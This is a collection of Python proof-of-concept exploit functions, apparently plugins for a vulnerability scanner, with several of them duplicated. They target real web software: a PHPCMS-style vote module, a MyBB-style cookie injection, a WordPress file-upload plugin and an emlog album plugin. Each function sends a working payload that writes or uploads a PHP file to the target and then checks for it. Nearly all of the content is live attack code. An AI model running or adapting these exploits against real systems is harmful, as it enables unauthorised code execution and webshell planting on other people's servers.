def verify(cls, args): vul_url = args['options']['target'] php = PhpVerify() ids = cls.get_vote_links(args) if ids: for i in ids: vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str( i) exploit_url = vul_url + vul_path if args['options']['verbose']: print '[*] Request URL: ' + exploit_url payload = { 'subjectid': i, 'radio[]': ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),' '"%s");\x80' % php.get_content() } requests.post(exploit_url, data=payload) v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str( i) requests.get(vul_url + v_path) shell_url = vul_url + '/readme.php' if php.check(shell_url): args['success'] = True args['poc_ret']['vul_url'] = args['options']['target'] return args else: args['success'] = False else: args['success'] = False return args
def verify(cls, args): vul_url = args['options']['target'] php = PhpVerify() ids = cls.get_vote_links(args) if ids: for i in ids: vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(i) exploit_url = vul_url + vul_path if args['options']['verbose']: print '[*] Request URL: ' + exploit_url payload = { 'subjectid': i, 'radio[]': ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),' '"%s");\x80' % php.get_content() } requests.post(exploit_url, data=payload) v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(i) requests.get(vul_url + v_path) shell_url = vul_url + '/readme.php' if php.check(shell_url): args['success'] = True args['poc_ret']['vul_url'] = args['options']['target'] return args else: args['success'] = False else: args['success'] = False return args
def verify(cls, args): vul_url = args["options"]["target"] php = PhpVerify() ids = cls.get_vote_links(args) if ids: for i in ids: vul_path = "/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1" % str(i) exploit_url = vul_url + vul_path if args["options"]["verbose"]: print "[*] Request URL: " + exploit_url payload = { "subjectid": i, "radio[]": ");fputs(fopen(base64_decode(cmVhZG1lLnBocA),w)," '"%s");\x80' % php.get_content(), } requests.post(exploit_url, data=payload) v_path = "/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1" % str(i) requests.get(vul_url + v_path) shell_url = vul_url + "/readme.php" if php.check(shell_url): args["success"] = True args["poc_ret"]["vul_url"] = args["options"]["target"] return args else: args["success"] = False else: args["success"] = False return args
def verify(cls, args): vul_url = args['options']['target'] shell_url = vul_url + '/inc/class_tester.php' php = PhpVerify() cls.cookies['shutdown_functions[0][arguments][]'] = \ cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content())) if args['options']['verbose']: print '[*] Request URL: ' + vul_url print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]'] requests.get(vul_url, cookies=cls.cookies) if php.check(shell_url): args['success'] = True args['poc_ret']['vul_url'] = vul_url return args
def verify(cls, args): vul_url = args['options']['target'] shell_url = vul_url + '/inc/class_tester.php' php = PhpVerify() cls.cookies['shutdown_functions[0][arguments][]'] = \ cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content())) if args['options']['verbose']: print '[*] Request URL: ' + vul_url print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]'] requests.get(vul_url, cookies=cls.cookies) if php.check(shell_url): args['success'] = True args['poc_ret']['vul_url'] = vul_url return args else: args['success'] = False return args
def verify(cls, args): url = args['options']['target'] php = PhpVerify().get_content() ver_url = '%s/wordpress/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php' % url path_url = '%s/wordpress/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/info.php' % url if args['options']['verbose']: print '[*] Request url: ' + ver_url print '[*] Upload file: ' + php payload = { 'files': ('info.php', php, 'application/octet-stream'), 'action': 'upload' } requests.post(ver_url, files=payload) r = requests.get(path_url) if '202cb962ac59075b964b07152d234b70' in r.content: args['success'] = True args['poc_ret']['vul_url'] = ver_url return args
def verify(cls, args): url = args['options']['target'] verify_url = '%s/content/plugins/kl_album/kl_album_ajax_do.php' % url php = PhpVerify().get_content() if args['options']['verbose']: print '[*] Request URL: ' + verify_url print '[*] Upload File: ' + php verify_file = {'Filedata': ('v%27.php', php), 'album': (None, '11111')} content = requests.post(verify_url, files=verify_file).content try: file_path = re.search("..(/content.*?\.php)", content).group(1) except: return args # check if args['options']['verbose']: print '[*] Checking...' check_content = requests.post(url + file_path).content if '202cb962ac59075b964b07152d234b70' in check_content: args['success'] = True args['poc_ret']['vul_url'] = verify_url return args